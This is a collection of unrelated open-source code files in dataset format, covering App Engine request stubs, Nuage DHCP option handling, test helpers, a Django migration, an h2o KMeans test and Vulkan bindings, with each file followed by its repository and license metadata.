module_name_to_version_to_hostname)
def get_module_names(self):
"""Returns a list of module names."""
return self._module_names
def get_versions(self, module):
"""Returns a list of versions for a module.
Args:
module: A str containing the name of the module.
Returns:
A list of str containing the versions for the specified module.
Raises:
ModuleDoesNotExistError: The module does not exist.
"""
if module not in self._module_name_to_versions:
raise ModuleDoesNotExistError()
return self._module_name_to_versions[module]
def get_default_version(self, module):
"""Returns the default version for a module.
Args:
module: A str containing the name of the module.
Returns:
A str containing the default version for the specified module.
Raises:
ModuleDoesNotExistError: The module does not exist.
"""
if module not in self._module_name_to_default_versions:
raise ModuleDoesNotExistError()
return self._module_name_to_default_versions[module]
def get_hostname(self, module, version, instance=None):
"""Returns the hostname for a (module, version, instance) tuple.
If instance is set, this will return a hostname for that particular
instances. Otherwise, it will return the hostname for load-balancing.
Args:
module: A str containing the name of the module.
version: A str containing the version.
instance: An optional str containing the instance ID.
Returns:
A str containing the hostname.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
InvalidInstanceIdError: The instance ID is not valid for the
module/version or the module/version uses automatic scaling.
"""
if module not in self._module_name_to_version_to_hostname:
raise ModuleDoesNotExistError()
if version not in self._module_name_to_version_to_hostname[module]:
raise VersionDoesNotExistError()
if instance:
raise InvalidInstanceIdError()
return self._module_name_to_version_to_hostname[module][version]
def set_num_instances(self, module, version, instances):
"""Sets the number of instances to run for a version of a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
instances: An int containing the number of instances to run.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
if module not in self._module_name_to_versions:
raise ModuleDoesNotExistError()
if version not in self._module_name_to_versions[module]:
raise VersionDoesNotExistError()
raise NotSupportedWithAutoScalingError()
def get_num_instances(self, module, version):
"""Gets the number of instances running for a version of a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
if module not in self._module_name_to_versions:
raise ModuleDoesNotExistError()
if version not in self._module_name_to_versions[module]:
raise VersionDoesNotExistError()
raise NotSupportedWithAutoScalingError()
def start_module(self, module, version):
"""Starts a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
if module not in self._module_name_to_versions:
raise ModuleDoesNotExistError()
if version not in self._module_name_to_versions[module]:
raise VersionDoesNotExistError()
raise NotSupportedWithAutoScalingError()
def stop_module(self, module, version):
"""Stops a module.
Args:
module: A str containing the name of the module.
version: A str containing the version.
Raises:
ModuleDoesNotExistError: The module does not exist.
VersionDoesNotExistError: The version does not exist.
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
"""
if module not in self._module_name_to_versions:
raise ModuleDoesNotExistError()
if version not in self._module_name_to_versions[module]:
raise VersionDoesNotExistError()
raise NotSupportedWithAutoScalingError()
def add_event(self, runnable, eta, service=None, event_id=None):
"""Add a callable to be run at the specified time.
Args:
runnable: A callable object to call at the specified time.
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
This should be set if event_id is set.
event_id: A str containing the id of the event. If set, this can be passed
to update_event to change the time at which the event should run.
"""
logging.warning('Scheduled events are not supported with '
'_LocalFakeDispatcher')
def update_event(self, eta, service, event_id):
"""Update the eta of a scheduled event.
Args:
eta: An int containing the time to run the event, in seconds since the
epoch.
service: A str containing the name of the service that owns this event.
event_id: A str containing the id of the event to update.
"""
logging.warning('Scheduled events are not supported with '
'_LocalFakeDispatcher')
def add_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None):
"""Process an HTTP request.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched to the default
module.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the module and version.
Returns:
A ResponseTuple containing the response information for the HTTP request.
"""
logging.warning('Request dispatching is not supported with '
'_LocalFakeDispatcher')
return ResponseTuple('501 Not Implemented', [], '')
def add_async_request(self, method, relative_url, headers, body, source_ip,
module_name=None, version=None, instance_id=None):
"""Dispatch an HTTP request asynchronously.
Args:
method: A str containing the HTTP method of the request.
relative_url: A str containing path and query string of the request.
headers: A list of (key, value) tuples where key and value are both str.
body: A str containing the request body.
source_ip: The source ip address for the request.
module_name: An optional str containing the module name to service this
request. If unset, the request will be dispatched to the default
module.
version: An optional str containing the version to service this request.
If unset, the request will be dispatched to the default version.
instance_id: An optional str containing the instance_id of the instance to
service this request. If unset, the request will be dispatched to
according to the load-balancing for the module and version.
"""
logging.warning('Request dispatching is not supported with '
'_LocalFakeDispatcher')
def send_background_request(self, module_name, version, instance,
background_request_id):
"""Dispatch a background thread request.
Args:
module_name: A str containing the module name to service this
request.
version: A str containing the version to service this request.
instance: The instance to service this request.
background_request_id: A str containing the unique background thread
request identifier.
Raises:
NotSupportedWithAutoScalingError: The provided module/version uses
automatic scaling.
BackgroundThreadLimitReachedError: The instance is at its background
thread capacity.
"""
logging.warning('Request dispatching is not supported with '
'_LocalFakeDispatcher')
raise BackgroundThreadLimitReachedError()
_local_dispatcher = _LocalFakeDispatcher()
class RequestInfo(object):
"""Allows stubs to lookup state linked to the request making the API call."""
def get_request_url(self, request_id):
"""Returns the URL the request e.g. 'http://localhost:8080/foo?bar=baz'.
Args:
request_id: The string id of the request making the API call.
Returns:
The URL of the request as a string.
"""
raise NotImplementedError()
def get_request_environ(self, request_id):
"""Returns a dict containing the WSGI environ for the request."""
raise NotImplementedError()
def get_module(self, request_id):
"""Returns the name of the module serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
A str containing the module name.
"""
raise NotImplementedError()
def get_version(self, request_id):
"""Returns the version of the module serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
A str containing the version.
"""
raise NotImplementedError()
def get_instance(self, request_id):
"""Returns the instance serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
An opaque representation of the instance serving this request. It should
only be passed to dispatcher methods expecting an instance.
"""
raise NotImplementedError()
def get_dispatcher(self):
"""Returns the Dispatcher.
Returns:
The Dispatcher instance.
"""
raise NotImplementedError()
class _LocalRequestInfo(RequestInfo):
"""Lookup information about a request using environment variables."""
def get_request_url(self, request_id):
"""Returns the URL the request e.g. 'http://localhost:8080/foo?bar=baz'.
Args:
request_id: The string id of the request making the API call.
Returns:
The URL of the request as a string.
"""
try:
host = os.environ['HTTP_HOST']
except KeyError:
host = os.environ['SERVER_NAME']
port = os.environ['SERVER_PORT']
if port != '80':
host += ':' + port
url = 'http://' + host
url += urllib.quote(os.environ.get('PATH_INFO', '/'))
if os.environ.get('QUERY_STRING'):
url += '?' + os.environ['QUERY_STRING']
return url
def get_request_environ(self, request_id):
"""Returns a dict containing the WSGI environ for the request."""
return os.environ
def get_module(self, request_id):
"""Returns the name of the module serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
A str containing the module name.
"""
return 'default'
def get_version(self, request_id):
"""Returns the version of the module serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
A str containing the version.
"""
return '1'
def get_instance(self, request_id):
"""Returns the instance serving this request.
Args:
request_id: The string id of the request making the API call.
Returns:
An opaque representation of the instance serving this request. It should
only be passed to dispatcher methods expecting an instance.
"""
return object()
def get_dispatcher(self):
"""Returns the Dispatcher.
Returns:
The Dispatcher instance.
"""
return _local_dispatcher
_local_request_info = _LocalRequestInfo()
|
yencarnacion/jaikuengine
|
.google_appengine/google/appengine/api/request_info.py
|
Python
|
apache-2.0
| 24,848
|
# Copyright 2016 NOKIA
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import netaddr
from nuage_neutron.vsdclient.common import cms_id_helper
from nuage_neutron.vsdclient.common import constants
from nuage_neutron.vsdclient.common import helper
from nuage_neutron.vsdclient.common import nuagelib
from nuage_neutron.vsdclient import restproxy
DHCP_OPTIONS = constants.DHCP_OPTIONS
LOG = logging.getLogger(__name__)
class NuageDhcpOptions(object):
def __init__(self, restproxy_server):
self.restproxy = restproxy_server
@staticmethod
def _get_dhcp_template(ip_version, _value, _length, _type):
return {
"value": _value,
"length": _length,
"type": DHCP_OPTIONS[ip_version][_type]
}
@staticmethod
def _get_extra_dhcp_template(_value, _type, _external_id):
return {
"actualValues": _value,
"actualType": _type,
"externalID": _external_id
}
def create_nuage_dhcp(self, subnet, parent_id=None, network_type=None):
"""Function: create_nuage_dhcp
Creates the nuage DHCP options on a l2 only domain and domain/subnet
subnet : neutron subnet on which to create the dhcpoptions
parent_id : Nuage l2 only domain or dom/subnet ID
network_type : l2 only domain or domain/subnet
"""
LOG.debug('create_nuage_dhcp() for resource %s '
'network type %s', parent_id, network_type)
opts_todo = []
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
# ipv4 and ipv6
if subnet.get('dns_nameservers'):
opts_todo.append(dhcp_options['dns_nameservers'])
# ipv4 only
if ip_version == 4:
if subnet.get('host_routes'):
opts_todo.append(
dhcp_options['classless-static-route'])
opts_todo.append(
dhcp_options['microsoft-classless-static-route'])
if (subnet.get('gateway_ip') and
network_type == constants.NETWORK_TYPE_L2):
opts_todo.append(
dhcp_options['gateway_ip'])
for opt in opts_todo:
self._create_nuage_dhcp_options(subnet,
parent_id,
network_type,
opt)
def clear_nuage_dhcp_for_ip_version(self, ip_version, parent_id,
network_type):
"""Function: clear_nuage_dhcp_for_ip_version
Clears the dhcp options for the specified ip_version on the l2domain
or l3 subnet.
:param ip_version: 4 or 6
:param parent_id: l2domain_id or domainsubnet_id
:param network_type: NETWORK_TYPE_L2 or NETWORK_TYPE_L3
:return: None
"""
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if network_type == constants.NETWORK_TYPE_L2:
resource = nuage_dhcp_options.resource_by_l2domainid(parent_id)
else:
resource = nuage_dhcp_options.resource_by_subnetid(parent_id)
dhcptions = self.restproxy.get(resource)
for option in dhcptions:
self.restproxy.delete(
nuage_dhcp_options.dhcp_resource(option['ID']))
def update_nuage_dhcp(self, subnet, parent_id=None,
network_type=None):
"""Function: update_nuage_dhcp
Update the nuage DHCP options on a l2 only domain and domain/subnet
subnet : neutron subnet on which to updates the dhcpoptions
parent_id : Nuage l2 only domain or dom/subnet ID
network_type : l2 only domain or domain/subnet
"""
LOG.debug('update_nuage_dhcp() for resource %s '
'network type %s', parent_id, network_type)
"""
In case of update, we need to delete the objects
only if the subnet has them as empty list otherwise
let create method take care of rest.
"""
opts_todo = []
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
# ipv4 and ipv6
if ('dns_nameservers' in subnet and
not subnet['dns_nameservers']):
opts_todo.append(dhcp_options['dns_nameservers'])
# ipv4 only
if ip_version == 4:
if ('host_routes' in subnet and
not subnet['host_routes']):
opts_todo.append(
dhcp_options['classless-static-route'])
opts_todo.append(
dhcp_options['microsoft-classless-static-route'])
if ('gateway_ip' in subnet and
not subnet['gateway_ip'] and
network_type == constants.NETWORK_TYPE_L2):
opts_todo.append(dhcp_options['gateway_ip'])
for opt in opts_todo:
self._delete_nuage_dhcp_option(
parent_id, network_type, ip_version, opt)
self.create_nuage_dhcp(subnet, parent_id, network_type)
def delete_vport_nuage_dhcp(self, dhcp_opt, vport_id):
"""Function: delete_nuage_extra_dhcp_option
Delete the nuage DHCP options for the Vports
dhcp_opt : DHCP opt to delete from VSD.
vport_id : Vport on which to delete the DHCP option.
"""
LOG.debug('delete nuage dhcp option for resource %s', vport_id)
ip_version = dhcp_opt['ip_version']
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
dhcp_id = self._check_dhcp_option_exists(
vport_id, constants.VPORT, ip_version,
helper.convert_hex_for_vsd(hex(dhcp_opt['opt_name'])))
resp = self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
return resp
def create_update_extra_dhcp_option_on_vport(self, extra_dhcp_opt,
parent_id, external_id):
"""Function: create_update_extra_dhcp_option_on_vport
Creates/Updates nuage DHCP options on Vport
extra_dhcp_opt : extra DHCP options details to be configured.
parent_id : Vport on which to create the DHCP options.
external_id : neutron portID on which we create the DHCP options.
"""
LOG.debug('Create/Update nuage dhcp option for '
'resource %s', parent_id)
ip_version = extra_dhcp_opt['ip_version']
option_number = extra_dhcp_opt['opt_name']
option_value = extra_dhcp_opt['opt_value']
external_id = cms_id_helper.get_vsd_external_id(external_id)
length = 0
opt_value = ""
dhcp_id = self._check_dhcp_option_exists(
parent_id, constants.VPORT, ip_version,
helper.convert_hex_for_vsd(hex(option_number)))
if option_number in constants.PRCS_DHCP_OPT_AS_RAW_HEX[ip_version]:
try:
for value in option_value:
val = helper.convert_hex_for_vsd(value)
opt_value = opt_value + val
length = len(val) + length
except Exception as e:
raise e
if length:
length = helper.convert_hex_for_vsd(hex(length // 2))
data = {"length": length}
opt_type = helper.convert_hex_for_vsd(hex(option_number))
data['type'] = opt_type
data["value"] = opt_value
data["externalID"] = external_id
else:
data = self._get_extra_dhcp_template(option_value,
option_number, external_id)
return self._set_nuage_dhcp_options(parent_id, ip_version, data,
dhcp_id, constants.VPORT)
def delete_nuage_extra_dhcp_option(self, dhcp_id, ip_version, on_rollback):
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
try:
self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
except restproxy.RESTProxyError as e:
if on_rollback:
e.msg = ("Rollback also failed due to the exception: " +
str(e))
raise
def _create_nuage_dhcp_options(self, subnet, resource_id,
resource_type, dhcp_option):
"""Function: create_nuage_dhcp_options
Creates the nuage DHCP options on a l2 only domain and domain/subnet
subnet : openstack subnet
resource_id : Nuage l2 only domain or dom/subnetID
resource_type : l2 domain or domain/subnet
dhcp_option : Type of the DHCP option
"""
LOG.debug('_create_nuage_dhcp_options() for resource %s', resource_id)
ip_version = subnet['ip_version']
dhcp_options = DHCP_OPTIONS[ip_version]
dhcp_id = self._check_dhcp_option_exists(resource_id, resource_type,
ip_version, dhcp_option)
if dhcp_option == dhcp_options['dns_nameservers']\
and subnet['dns_nameservers']:
data = self._get_dns_tmpl(ip_version, subnet['dns_nameservers'])
elif ip_version == 4:
if (dhcp_option == dhcp_options[
'microsoft-classless-static-route'] and
subnet['host_routes']):
data = self._get_static_rte_tmpl(
ip_version,
subnet['host_routes'], 'microsoft-classless-static-route')
elif (dhcp_option == dhcp_options['classless-static-route'] and
subnet['host_routes']):
data = self._get_static_rte_tmpl(
ip_version,
subnet['host_routes'], 'classless-static-route')
elif (dhcp_option == dhcp_options['gateway_ip'] and
subnet['gateway_ip']):
data = self._get_gateway_ip_tmpl(
ip_version, subnet['gateway_ip'])
else:
raise Exception("Unknown DHCPv4 option")
else:
raise Exception("Unknown DHCP option")
data['externalID'] = helper.get_external_id_based_on_subnet_id(subnet)
self._set_nuage_dhcp_options(resource_id, ip_version, data,
dhcp_id, resource_type)
def _set_nuage_dhcp_options(self, resource_id, ip_version,
data, dhcp_id=False, resource_type=None):
"""Function: set_nuage_dhcp_options
Sets the nuage DHCP options on a l2 only domain and subnet/port.
resource_id : Nuage l2 only domian or dom/subnetID or VportID
ip_version : IP version of the option
data : data the user is going to apply as dhcp_option
dhcp_id : Nuage DHCP option ID
l2_dom : l2 only domain or domain/subnet
"""
LOG.debug('_set_nuage_dhcp_options() for resource %s', resource_id)
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if data:
if dhcp_id:
# dhcp option already set for this l2domain. We do a PUT
# operation with the new data
del data["externalID"]
return self.restproxy.put(
nuage_dhcp_options.dhcp_resource(dhcp_id),
data)
else:
if resource_type == constants.VPORT:
# POST the dhcp options for the Vport
return self.restproxy.post(
nuage_dhcp_options.resource_by_vportid(resource_id),
data)
elif resource_type == constants.NETWORK_TYPE_L2:
# POST the dhcp options for the l2only domain
return self.restproxy.post(
nuage_dhcp_options.resource_by_l2domainid(resource_id),
data)
else:
# POST the dhcp options for the domain/subnet
return self.restproxy.post(
nuage_dhcp_options.resource_by_subnetid(resource_id),
data)
elif resource_type != constants.VPORT:
return self.restproxy.delete(
nuage_dhcp_options.dhcp_resource(dhcp_id))
def _delete_nuage_dhcp_option(self, subnet_id, isl2dom, ip_version,
dhcp_type):
"""Function: _delete_nuage_dhcp_option
Deletes the nuage DHCP options on a l2 only doamain and domain/subnet
subnet_id : Nuage l2 only domian or dom/subnet ID
isl2dom : l2 only domain or domain/subnet
ip_version : IP version of the option
dhcp_type : Type of the DHCP option
"""
LOG.debug('_delete_nuage_dhcp_option() called for subnet %s '
'dhcp_type %s', subnet_id, dhcp_type)
# Check if the dhcp options exists of type dhcp_type on this l2/l3
# subnet
dhcp_id = self._check_dhcp_option_exists(subnet_id, isl2dom,
ip_version, dhcp_type)
if dhcp_id:
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
self.restproxy.delete(nuage_dhcp_options.dhcp_resource(dhcp_id))
def _check_dhcp_option_exists(self, resource_id, resource_type,
ip_version, dhcp_type):
"""Function: _check_dhcp_option_exists
Check if the dhcp option exists
resource_id: vsd-id of the resource
resource_type : If the resource is a l2/l3/vport
ip_version : IP version of the option
dhcp_type : Type of the DHCP option
"""
LOG.debug('_check_dhcp_option_exists() for resource %s', resource_id)
nuage_dhcp_options = nuagelib.NuageDhcpOptions(ip_version)
if resource_type == constants.VPORT:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_vportid(resource_id))
elif resource_type == constants.NETWORK_TYPE_L2:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_l2domainid(resource_id))
else:
dhcp_options = self.restproxy.get(
nuage_dhcp_options.resource_by_subnetid(resource_id))
return NuageDhcpOptions._is_option_already_present(dhcp_options,
dhcp_type)
@staticmethod
def _is_option_already_present(dhcpoptions, dhcp_type):
# we need to verify that there is a same option already present.
for dhcp_item in dhcpoptions:
if dhcp_item['type'] == dhcp_type:
return dhcp_item['ID']
return None
def _get_dns_tmpl(self, ip_version, dns_list):
_dns_length = format(4 * len(dns_list), '02x')
_dns = ""
for dns_item in dns_list:
_dns = _dns + self.get_ip_hex_value(netaddr.IPNetwork(dns_item).ip)
return NuageDhcpOptions._get_dhcp_template(
ip_version, _dns, _dns_length, 'dns_nameservers')
# TODO(team): Will move this util function to common utils
@staticmethod
def get_ip_hex_value(ip):
return str(hex(ip)[2:]).zfill(8)
def _get_static_rte_tmpl(self, ip_version,
static_routes, static_route_type):
# minimum is 5, multiplied by the number of routes
_length_d = len(static_routes) * 5
_data = ""
for static_route in static_routes:
_ip = netaddr.IPNetwork(static_route['destination'])
# length of the subnet
_netmask_length = \
sum([1 for a in str(_ip.netmask).split('.') if int(a) > 0])
_length_d = _length_d + _netmask_length
cidr_prefix = format(_ip.prefixlen, '02x')
# need to do that to get the correction padding for length
cidr_ip = self.get_ip_hex_value(_ip.ip)[:_netmask_length * 2]
_ip = netaddr.IPAddress(static_route['nexthop'])
nexthop_ip = self.get_ip_hex_value(_ip)
_data += "%s%s%s" % (cidr_prefix, cidr_ip, nexthop_ip)
_length = format(_length_d, '02x')
return NuageDhcpOptions._get_dhcp_template(
ip_version, _data, _length, static_route_type)
def _get_gateway_ip_tmpl(self, ip_version, gateway_ip):
_length = format(4, '02x')
_ip = netaddr.IPAddress(gateway_ip)
_data = self.get_ip_hex_value(_ip)
return NuageDhcpOptions._get_dhcp_template(
ip_version, _data, _length, 'gateway_ip')
|
nuagenetworks/nuage-openstack-neutron
|
nuage_neutron/vsdclient/resources/dhcpoptions.py
|
Python
|
apache-2.0
| 17,366
|
from nose.exc import SkipTest
def test_ok():
pass
def test_err():
raise Exception("oh no")
def test_fail():
assert False, "bye"
def test_skip():
raise SkipTest("not me")
|
DESHRAJ/fjord
|
vendor/packages/nose/functional_tests/doc_tests/test_xunit_plugin/support/test_skip.py
|
Python
|
bsd-3-clause
| 190
|
"""
Python 3 compatibility tools.
"""
__all__ = ['bytes', 'asbytes', 'isfileobj', 'getexception', 'strchar',
'unicode', 'asunicode', 'asbytes_nested', 'asunicode_nested',
'asstr', 'open_latin1']
import sys
if sys.version_info[0] >= 3:
import io
bytes = bytes
unicode = str
asunicode = str
def asbytes(s):
if isinstance(s, bytes):
return s
return s.encode('latin1')
def asstr(s):
if isinstance(s, str):
return s
return s.decode('latin1')
def isfileobj(f):
return isinstance(f, io.FileIO)
def open_latin1(filename, mode='r'):
return open(filename, mode=mode, encoding='iso-8859-1')
strchar = 'U'
from io import BytesIO, StringIO #statsmodels
else:
bytes = str
unicode = unicode
asbytes = str
asstr = str
strchar = 'S'
def isfileobj(f):
return isinstance(f, file)
def asunicode(s):
if isinstance(s, unicode):
return s
return s.decode('ascii')
def open_latin1(filename, mode='r'):
return open(filename, mode=mode)
from StringIO import StringIO
BytesIO = StringIO
def getexception():
return sys.exc_info()[1]
def asbytes_nested(x):
if hasattr(x, '__iter__') and not isinstance(x, (bytes, unicode)):
return [asbytes_nested(y) for y in x]
else:
return asbytes(x)
def asunicode_nested(x):
if hasattr(x, '__iter__') and not isinstance(x, (bytes, unicode)):
return [asunicode_nested(y) for y in x]
else:
return asunicode(x)
|
pprett/statsmodels
|
statsmodels/compatnp/py3k.py
|
Python
|
bsd-3-clause
| 1,592
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
]
operations = [
migrations.CreateModel(
name='Item',
fields=[
('id', models.AutoField(auto_created=True, verbose_name='ID', serialize=False, primary_key=True)),
],
),
]
|
williamHuang5468/LearningDjango
|
todoLists/lists/migrations/0001_initial.py
|
Python
|
mit
| 420
|
import unittest, time, sys, random
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_glm, h2o_kmeans, h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
def tearDown(self):
h2o.check_sandbox_for_errors()
@classmethod
def setUpClass(cls):
# assume we're at 0xdata with it's hdfs namenode
h2o.init(1)
@classmethod
def tearDownClass(cls):
h2o.tear_down_cloud()
def test_KMeans_allstate_s3n_thru_hdfs(self):
bucket = 'home-0xdiag-datasets'
csvFilename = "CAT*"
importFolderPath = "cats"
csvPathname = importFolderPath + "/" + csvFilename
timeoutSecs = 600
trialMax = 1
for trial in range(trialMax):
trialStart = time.time()
hex_key = csvFilename + "_" + str(trial) + ".hex"
start = time.time()
parseResult = h2i.import_parse(bucket=bucket, path=csvPathname, schema='s3n', hex_key=hex_key,
timeoutSecs=timeoutSecs, retryDelaySecs=10, pollTimeoutSecs=60))
elapsed = time.time() - start
print "parse end on ", hex_key, 'took', elapsed, 'seconds',\
"%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
print "parse result:", parseResult['destination_key']
kwargs = {
'cols': None,
'initialization': 'Furthest',
'k': 12
}
start = time.time()
kmeans = h2o_cmd.runKMeans(parseResult=parseResult, \
timeoutSecs=timeoutSecs, retryDelaySecs=2, pollTimeoutSecs=120, **kwargs)
elapsed = time.time() - start
print "kmeans end on ", csvFilename, 'took', elapsed, 'seconds.', \
"%d pct. of timeout" % ((elapsed/timeoutSecs) * 100)
h2o_kmeans.simpleCheckKMeans(self, kmeans, **kwargs)
### print h2o.dump_json(kmeans)
inspect = h2o_cmd.runInspect(None,key=kmeans['destination_key'])
print h2o.dump_json(inspect)
print "Trial #", trial, "completed in", time.time() - trialStart, "seconds.", \
if __name__ == '__main__':
h2o.unit_main()
|
vbelakov/h2o
|
py/testdir_ec2_only/test_KMeans_cats_s3n_thru_hdfs.py
|
Python
|
apache-2.0
| 2,199
|
import time
import webbrowser
def fresh():
i=0
utube=r"https://www.youtube.com/watch?v=J3BpOKzEdMI"
while i<2:
print 'time:%s' %time.ctime()
webbrowser.open(utube)
time.sleep(2)
i+=1
fresh()
|
lakshita-bhatia/python-scripts
|
say_hello.py
|
Python
|
mit
| 206
|
import functools
import sys
import types
from nose import SkipTest
from nose.tools import eq_
from .. import helper
from ..helper import MockXPI
from appvalidator.constants import SPIDERMONKEY_INSTALLATION
from appvalidator.errorbundle import ErrorBundle
from appvalidator.errorbundle.outputhandlers.shellcolors import OutputHandler
import appvalidator
import appvalidator.testcases.content
appvalidator.testcases.javascript.traverser.JS_DEBUG = True
appvalidator.testcases.javascript.predefinedentities.enable_debug()
def uses_js(func):
if func:
try:
setattr(func, "js", True)
except Exception:
# If Python >2.7 squaks about methods being bound, just work around
# the nonsense.
setattr(func.__func__, "js", True)
return func
def skip_on_acorn(func):
"""Skips a test when the test is run under Acorn."""
if not SPIDERMONKEY_INSTALLATION:
raise SkipTest()
return func
class TestCase(helper.TestCase):
"""A TestCase object with specialized functions for JS testing."""
def __init__(self, *args, **kwargs):
super(TestCase, self).__init__(*args, **kwargs)
for method in filter(callable, (getattr(self, m) for m in dir(self))):
if not method.__name__.startswith("test_"):
continue
uses_js(method)
uses_js(None)
def setUp(self):
self.file_path = "foo.js"
self.final_context = None
super(TestCase, self).setUp()
def run_script_from_file(self, path):
"""
Run the standard set of JS engine tests on a script found at the
location in `path`.
"""
with open(path) as script_file:
return self.run_script(script_file.read())
def run_script(self, script):
"""
Run the standard set of JS engine tests on the script passed via
`script`.
"""
print "Running", script
if self.err is None:
self.setup_err()
appvalidator.testcases.content._process_file(self.err, MockXPI(),
self.file_path, script)
if self.err.final_context is not None:
print self.err.final_context.output()
self.final_context = self.err.final_context
def get_var(self, name):
"""
Return the value of a variable from the final script context.
"""
try:
return self.final_context.data[name].get_literal_value()
except KeyError:
raise ("Test seeking variable (%s) not found in final context." %
name)
def assert_var_eq(self, name, value, explanation=None):
"""
Assert that the value of a variable from the final script context
contains the value specified.
"""
print "Testing {var} == {val}".format(var=name, val=value)
val = self.get_var(name)
if isinstance(val, float):
val *= 100000
val = round(val)
val /= 100000
eq_(val, value,
explanation or "%r doesn't equal %r" % (val, value))
def must_assert(func):
"Decorator for asserting that a JS assert method is used."
@functools.wraps(func)
def wrap(self):
func(self)
assert getattr(self.err, "asserts", False), "Does not assert!"
return wrap
def silent(func):
"Decorator for asserting that the output of a test is silent."
@functools.wraps(func)
def wrap(self):
func(self)
self.assert_silent()
return wrap
def warnings(count=None):
"Decorator for asserting that the output of a test has warnings."
def decorator(func):
@functools.wraps(func)
def wrap(self):
func(self)
self.assert_failed(with_warnings=True)
if count is not None:
eq_(len(self.err.warnings), count,
"Warning count does not match")
return wrap
return decorator
def errors(count=None):
"Decorator for asserting that the output of a test has errors."
def decorator(func):
@functools.wraps(func)
def wrap(self):
func(self)
self.assert_failed(with_errors=True)
if count is not None:
eq_(len(self.err.errors), count,
"Warning count does not match")
return wrap
return decorator
|
diox/app-validator
|
tests/js/js_helper.py
|
Python
|
bsd-3-clause
| 4,452
|
#!/usr/bin/python
import math
limit = (1 << 32) - 1
for i in xrange(65536 + 10):
if i == 0:
continue
temp = float(1 << 32) / float(i)
approx1 = int(math.floor(temp) - 3)
approx2 = int(math.floor(temp + 3))
for j in xrange(approx1, approx2 + 1):
if i*j >= (1 << 32):
exact = True
else:
exact = False
if i > limit / j:
check = True
else:
check = False
#print(i, j, exact, check)
if exact != check:
print('inexact', i, j)
|
daimajia/duktape
|
misc/c_overflow_test.py
|
Python
|
mit
| 458
|
from ctypes import byref, c_uint32
import vk
import ctypes
import time
ci = vk.InstanceCreateInfo(dict(
applicationInfo = dict(
applicationName = "vkstruct test",
applicationVersion = 1,
engineName = "hello engine",
engineVersion = 1,
apiVersion = (1 << 22 | 0 << 12 | 0)
),
#enabledLayerNames = ["VK_LAYER_LUNARG_api_dump"],
enabledExtensionNames = ["VK_KHR_surface", "VK_KHR_xcb_surface"],
))
instance = vk.Instance()
vk.createInstance(ci, None, instance)
count = c_uint32()
vk.enumeratePhysicalDevices(instance, byref(count), None)
physicaldevices = vk.PhysicalDevice.array(count.value)
vk.enumeratePhysicalDevices(instance, byref(count), physicaldevices)
for dev in physicaldevices:
prop = vk.PhysicalDeviceProperties.blank()
vk.getPhysicalDeviceProperties(dev, byref(prop))
print "apiversion", prop.apiVersion
print "driversion", prop.driverVersion
print "vendorid", prop.vendorID
print "deviceid", prop.deviceID
print "devicetype", prop.deviceType
print "devicename", prop.deviceName
vk.getPhysicalDeviceQueueFamilyProperties(dev, byref(count), None)
queuefamilies = vk.QueueFamilyProperties.array(count.value)
vk.getPhysicalDeviceQueueFamilyProperties(dev, byref(count), queuefamilies)
graphicQueueIndex = -1
for index, family in enumerate(queuefamilies):
qf = vk.QueueFlags(family.queueFlags)
print qf
if "GRAPHICS_BIT" in qf:
graphicQueueIndex = index
#print family.queueCount
#print family.timestampValidBits
#print family.minImageTransferGranularity
#print family.minImageTransferGranularity.width
#print family.minImageTransferGranularity.height
#print family.minImageTransferGranularity.depth
if graphicQueueIndex < 0:
raise Exception("No fitting queue")
break
else:
raise Exception("No devices found")
gpu = dev
ci = vk.DeviceCreateInfo(dict(
queueCreateInfos = [dict(
queueFamilyIndex = graphicQueueIndex,
queuePriorities = [1.0]
)],
